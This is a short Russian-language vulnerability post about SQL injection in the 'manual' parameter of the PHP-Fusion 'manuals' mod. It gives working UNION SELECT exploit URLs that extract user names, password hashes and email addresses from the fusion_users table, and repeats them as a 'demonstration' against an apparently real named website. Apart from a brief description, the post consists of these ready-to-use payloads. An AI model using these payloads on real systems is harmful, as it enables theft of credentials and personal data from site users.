Программа: PHP-Fusion Mod manuals

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «manual» сценарием manuals.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

username:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+
union+all+select+user_name,2+from+fusion_users—&page=1

password:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+
union+all+select+user_password,2+from+fusion_users—&page=1

email:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+
union+all+select+user_email,2+from+fusion_users—&page=1

Демонстрация:

http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users—&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users—&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users—&page=1
 



Оставить мнение